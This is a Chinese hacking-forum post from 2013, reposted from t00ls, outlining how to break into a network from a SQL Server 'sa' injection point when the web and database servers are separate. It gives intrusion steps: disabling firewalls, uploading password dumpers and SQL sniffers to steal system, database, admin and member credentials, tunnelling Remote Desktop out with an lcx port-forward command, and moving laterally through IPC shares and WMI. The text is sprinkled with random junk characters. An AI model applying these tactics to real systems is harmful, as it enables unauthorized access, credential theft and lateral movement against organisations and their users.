找回密码
 立即注册
查看: 2765|回复: 0
打印 上一主题 下一主题

SA权限网站和数据库分离的一些思路

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:46:01 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
# Q; X/ N7 n2 s) s/ ]3 W- Z5 P! M: o& `

2 K& i' Y5 s/ j* f
) Q/ T6 Z9 `2 U* m; O: J1 T$ FSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)/ _! U4 r0 C2 e; a2 _5 h# ]
0 O9 t  `* ~) t/ ~

( }& ?% x/ ^5 ]' L) @5 B9 a  v, r5 V一、DB机有公网IP.
* K! Y" T  I1 S/ N$ E# h! X4 W4 Q, y
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.2 s$ }% K8 M, y$ L

3 \$ Z2 h9 f7 w/ p. A! x
2 G9 _2 ^7 Q) g8 ?# E% k2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
; X6 M5 U5 }/ @+ p9 N
1 A2 g9 l) Q2 ]& H) o$ ^; T! `
# d4 t0 W2 b# Z4 f3 h" r3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
9 P) q4 B: T  F
# d( h; j/ e" _  y; W$ u+ Z! \# C4 i; M" B/ P& F
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.( N, \, p. h' n& N* m

# r- O. c* S6 f& X+ k+ h! C! a1 w' X  A$ V& O& N% ]2 d
& B/ f. I/ @0 U; o& c
二、DB机只有内网IP0 C3 w) R4 Y+ \! q  r7 P

# z1 u4 ]6 c2 a" z& K2 L1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.# D0 b6 I/ M; d- A6 P

2 A% g% M- t1 t5 Y  k2 h9 n5 p. @, O
2:停掉防火墙和IP策略再从内往外扫描.) p* C" _8 T, v' e& j

% W5 \; U$ M. Y  n
8 o0 a  L, M$ P3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.% o: x3 _/ q4 m6 `4 \3 U% M6 J. O

0 p+ w6 _. ~& X# l% c8 K' {: ^9 W! J/ k; P; V2 X+ q
4:学会密码规律分析往往会有惊喜.
' B' K5 ]- a3 E9 x& d, a. J6 i7 a
4 m$ I! w" u" _; ], V3 I, U+ R% v5 m. }1 v! C- S
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等& x. C4 T+ W% O) z# e

. F4 ~! I9 w: i  {$ i6 \
( |; W2 Y) Q  W1 X1 ?, L* U# s有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表